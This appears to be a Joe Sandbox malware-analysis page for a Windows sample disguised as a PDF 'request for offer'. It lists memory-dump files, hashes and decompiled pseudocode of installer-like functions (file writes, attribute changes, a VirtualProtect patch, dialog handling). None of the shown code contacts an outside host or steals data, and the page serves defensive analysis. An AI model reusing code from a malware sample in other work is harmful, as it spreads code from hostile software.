Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction ID: 5673304fef1064f236b213ef723108cd0aff19b739320a24e8caa41491261f20
Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction Fuzzy Hash: 27E0B63661025ABBDF109F65DC00AAB7B6CFB05260F048436BA55E6190E635E9219AE4

Uniqueness

Uniqueness Score: -1.00%

Function 00405E99 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E99(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e9d
0x00405ead
0x00405eb5
0x00000000
0x00405ebc
0x00000000
0x00405ebe

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00411297,0040CED0,00403383,0040CED0,00411297,00414ED0,00004000,?,00000000,004031AD,00000004), ref: 00405EAD

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: 98d10028cd881ca52753e47c7ca342dd4640a312c7922d7b1eeb81aac27e7924
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 41E0EC3226065AABDF109F55DC00EEB7F6CEB053A1F048836FD55E2190D631EA62DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}

0x100027d0
0x100027d5
0x100027e5
0x100027ed
0x100027f4
0x100027f9
0x100027fe
0x10002803
0x10002808
0x1000280d
0x10002812
0x10002812
0x1000281a

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000002.00000002.54387884763.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.54387828656.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387928274.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387958519.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C53(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x004028a1
0x004028a1
0x00402ade
0x00402aea

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2dd9cc9cc1aea5ec0b50319a0c07da8f3a17cbc140a998140c31c307c0c15a16
Instruction ID: c23ad3d9d814670b9e5664e680d4ed6fd6c27bb1f69e79231988cb8a8a550e85
Opcode Fuzzy Hash: 2dd9cc9cc1aea5ec0b50319a0c07da8f3a17cbc140a998140c31c307c0c15a16
Instruction Fuzzy Hash: CCD01232704104D7DB10DBA4AB4869D73A1EB40369B218577D602F21D0D6B9CA919B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404322 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404322(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x429218;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00404322
0x00404329
0x00404334
0x00000000
0x00404334
0x0040433a

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
Instruction ID: 8a3813f545c22c4fb684de807d70b5cf20617c54f99984af9f55df869fa0abe2
Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
Instruction Fuzzy Hash: B2C09B71740700BBDA20DF649D45F5777547764701F1488797741F60E0C674D410D62C

Uniqueness

Uniqueness Score: -1.00%

Function 00403402 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403402(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403410
0x00403416

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 0040430B Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040430B(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a248, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00404319
0x0040431f

APIs

SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004042F8 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042F8(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423724, _a4); // executed
				return _t2;
			}

0x00404302
0x00404308

APIs

KiUserCallbackDispatcher.NTDLL(?,004040D0), ref: 00404302

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C31(_t7);
				 *((intOrPtr*)(_t13 - 0x50)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402ade
0x00402aea

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c3d502f1175ca219f00b5441e492104dd4950c2107d743b82a59d12bdb94567a
Instruction ID: 8e321c80e88a1319f2525a3d5ae6c8193a45d3eb8196d3f8087198c45f82dbda
Opcode Fuzzy Hash: c3d502f1175ca219f00b5441e492104dd4950c2107d743b82a59d12bdb94567a
Instruction Fuzzy Hash: 05D05E73B141048BD720DBB8BE8585E73A8EB403193218837D402E1191E6B8C8524628

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404CED Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00404CED(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a268;
				_t282 = 0;
				_v24 =  *0x42a250 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a259 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404C3B(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a258) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42370c;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x423720;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42370c = _t282;
								 *0x423720 = _t282;
								 *0x42a2a0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a259 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404CBB();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x423720;
									_t195 =  *0x42a268;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a26c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x42921c + 0x10)) != _t282) {
											E00404BF6(0x3ff, 0xfffffffb, E00404C0E(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a26c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x423720);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a2a0 = _t306;
					 *0x423720 = GlobalAlloc(0x40,  *0x42a26c << 2);
					_t252 = LoadBitmapW( *0x42a240, 0x6e);
					 *0x423714 =  *0x423714 | 0xffffffff;
					_t313 = _t252;
					 *0x42371c = SetWindowLongW(_v8, 0xfffffffc, E004052E5);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42370c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42370c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406234(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004042D6(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004042D6(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a26c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x423720 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x423720 + _t316 * 4) = _t276;
									_t284 =  *( *0x423720 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a26c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040430B(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040430B(_v12);
								L91:
								return E0040433D(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404cfc
0x00404d0d
0x00404d12
0x00404d1a
0x00404d20
0x00404d28
0x00404d36
0x00404d39
0x00404f5a
0x00404f61
0x00404f75
0x00404f63
0x00404f65
0x00404f68
0x00404f69
0x00404f70
0x00404f70
0x00404f81
0x00404f8f
0x00404f92
0x00404fa8
0x0040501d
0x00405020
0x00405022
0x0040502c
0x0040503a
0x0040503a
0x0040503c
0x00405046
0x0040504c
0x0040504f
0x00405052
0x0040506d
0x00405054
0x0040505e
0x0040505e
0x00405052
0x00405046
0x00000000
0x00405020
0x00404fad
0x00404fb8
0x00404fbd
0x00404fc4
0x00404fc9
0x00404fcd
0x00404fd8
0x00404fd8
0x00404fdc
0x00404fe0
0x00404fe4
0x00404ff7
0x00404fe6
0x00404fe6
0x00404fed
0x00404ff3
0x00404fef
0x00404fef
0x00404fef
0x00404fed
0x00404ffb
0x00404ffd
0x00405010
0x00405013
0x00405016
0x00405016
0x00404fe0
0x00000000
0x00404fcd
0x00404faf
0x00404fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405070
0x00405070
0x00405077
0x004050e8
0x004050f0
0x004050f8
0x004050f8
0x00405101
